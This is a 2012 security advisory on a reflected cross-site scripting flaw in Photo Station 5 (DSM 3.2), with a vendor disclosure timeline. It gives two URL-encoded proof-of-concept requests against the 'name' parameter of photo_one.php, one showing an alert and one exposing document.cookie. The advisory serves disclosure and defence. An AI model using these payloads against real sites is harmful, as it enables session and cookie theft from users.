##############################################################################
###############################################################################
30/01/2012 Issue Discovered
05/02/2012 Vendor Notified
06/03/2012 Vendor released DSM 4
Class: Cross-Site Scripting (Reflected)
Photo Station5 is prone to a reflected cross site scripting vulnerability
Input passed via the 'name' parameter to page: /photo/photo_one.php pages is not properly verified, which allows remote attackers to inject arbitrary script code.
Successful exploitation could allow remote attackers to execute malicious scripts and steal sensitive data.
Photo Station 5, DSM 3.2 (1955)
Photo Station 5, DSM 3.2 (1955), Mac OS X 10.7.2/10.7.3, Firefox 9.0.1
1) /photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%38%38%2c%38%33%2c%38%33%29%29%3c%2f%73%63%72%69%70%74%3e
Generate an alert message in javascript with a text in it. The second name parameter is encoded using urlencode
2) /photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%61%20%68%72%65%66%3d%22
Generate an alert message with the document.cookie in it. The second name parameter is encoded using urlencode.
Simon Ganiere